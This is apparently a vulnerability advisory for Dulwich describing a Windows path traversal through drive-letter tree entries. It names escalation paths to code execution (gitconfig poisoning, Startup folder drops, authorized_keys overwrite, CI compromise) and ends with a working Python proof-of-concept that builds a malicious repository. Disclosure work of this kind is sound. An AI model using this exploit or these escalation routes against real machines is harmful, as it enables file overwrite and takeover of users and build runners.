### Affected files
* `dulwich/index.py` (Methods: `validate_path_element_ntfs`, `_tree_to_fs_path`)
* `dulwich/porcelain/__init__.py` (Method: `_checked_worktree_path`)
### Description / Summary
A High-severity Path Traversal vulnerability exists in Dulwich's checkout logic when running on Windows. The functions responsible for validating NTFS paths strictly reject `.git` variants, Alternate Data Streams (ADS), `git~1` short names, and reserved device names, but they completely fail to check for **DOS drive letter prefixes**.
A malicious Git tree can contain an entry named `C:`. When Dulwich processes this tree on a Windows client, the string passes the `validate_path_element_ntfs` check. Later, `_tree_to_fs_path` passes this path to `os.path.join(root, b"C:\\\\Users\\\\...")`.
On Windows, if the second argument to `os.path.join` contains an absolute drive letter, the `root` path is completely discarded. As a result, Dulwich writes the repository file to the absolute path outside of the intended Git worktree.
While the standard C `git` client explicitly blocks this via `has_dos_drive_prefix()` in `path.c`, Dulwich lacks this protection. Because Git trees are cross-platform, an attacker can author a malicious repository on Linux and wait for a Windows victim (or CI runner) to clone it.
### Potential impact
This vulnerability allows an attacker to achieve **Arbitrary File Write**, which can trivially be escalated to **Remote Code Execution (RCE)** or total system compromise on the victim's Windows machine.
Attack vectors include:
1. **Git Config Poisoning (RCE):** Writing a malicious `C:\\Users\\<victim>\\.gitconfig` file to set `core.sshCommand` to an arbitrary executable, granting RCE the next time the user interacts with Git.
2. **Persistence (RCE):** Dropping a malicious executable into `C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\`.
3. **SSH Key Overwrite:** Writing to `C:\\Users\\<victim>\\.ssh\\authorized_keys` to compromise remote servers accessible by the victim.
4. **CI/CD Compromise:** If a Windows-based CI/CD runner (e.g., GitHub Actions) automatically clones a malicious pull request, the runner is instantly compromised, potentially leaking repository secrets.
### Proof of Concept (PoC)
The following Python script (runnable on Linux) generates a malicious Git repository containing a payload that targets Windows clients.
```python
from dulwich.objects import Blob, Tree, Commit
from dulwich.repo import Repo
import os, tempfile
repo_path = tempfile.mkdtemp()
repo = Repo.init(repo_path)
# 1. Build the payload blob.
blob = Blob(); blob.data = b"pwned-by-drive-letter\\n"
repo.object_store.add_object(blob)
# 2. Build the malicious tree hierarchy: C:/Users/victim/evil.txt
evil_txt = Tree(); evil_txt[b"evil.txt"] = (0o100644, blob.id)
repo.object_store.add_object(evil_txt)
victim_dir = Tree(); victim_dir[b"victim"] = (0o040000, evil_txt.id)
repo.object_store.add_object(victim_dir)
users_dir = Tree(); users_dir[b"Users"] = (0o040000, victim_dir.id)
repo.object_store.add_object(users_dir)
# VULNERABILITY: The "C:" directory bypasses validation
c_drive = Tree(); c_drive[b"C:"] = (0o040000, users_dir.id)
repo.object_store.add_object(c_drive)
commit = Commit()
commit.tree = c_drive.id
commit.message = b"add feature"
commit.author = commit.committer = b"attacker <
[email protected]>"
commit.author_time = commit.commit_time = 1700000000
commit.author_timezone = commit.committer_timezone = 0
repo.object_store.add_object(commit)
repo.refs[b"refs/heads/main"] = commit.id
print(f"Malicious repo created at {repo_path}")
print(f"Clone with: dulwich clone {repo_path} /target/win/worktree")
# Result: A Windows checkout of this commit writes the payload directly to C:\\Users\\victim\\evil.txt
```